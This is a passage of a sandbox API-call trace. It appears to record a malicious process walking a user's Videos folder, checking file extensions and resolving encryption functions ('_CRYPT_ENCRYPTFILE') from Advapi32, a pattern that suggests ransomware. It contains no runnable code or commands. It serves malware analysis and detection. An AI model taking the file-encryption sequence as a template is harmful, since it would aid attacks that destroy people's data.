3 [0196.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.657] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.658] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.660] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.660] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.660] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.660] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.660] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.660] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="38Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.660] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.660] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.660] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.660] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.660] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.660] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0196.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0196.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0196.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0196.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0196.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0196.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0196.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0196.661] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.661] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0196.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0196.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0196.661] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0196.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0196.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0196.661] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0196.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0196.661] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0196.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0196.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0196.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0196.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0196.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0196.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0196.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0196.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0196.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0196.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0196.662] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0196.662] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0196.662] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0196.663] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0196.663] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.663] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50390e50, ftCreationTime.dwHighDateTime=0x1d5e42f, ftLastAccessTime.dwLowDateTime=0xd54794f0, ftLastAccessTime.dwHighDateTime=0x1d5deb6, ftLastWriteTime.dwLowDateTime=0xd54794f0, ftLastWriteTime.dwHighDateTime=0x1d5deb6, nFileSizeHigh=0x0, nFileSizeLow=0x5016, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="RIN_E.avi", cAlternateFileName="")) returned 0x90ae18 [0196.663] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0196.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0196.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0196.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0196.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0196.664] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.664] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0196.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0196.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0196.664] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.664] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0196.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0196.664] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0196.665] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.665] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0196.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0196.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0196.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0196.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0196.665] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.666] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.666] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0196.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0196.666] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0196.666] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0196.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0196.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0196.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0196.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0196.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0196.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0196.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0196.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0196.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0196.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0196.667] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.667] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.667] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0196.667] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0196.667] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0196.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0196.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0196.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0196.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0196.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0196.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0196.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0196.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0196.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0196.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0196.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0196.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0196.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0196.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0196.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0196.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0196.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 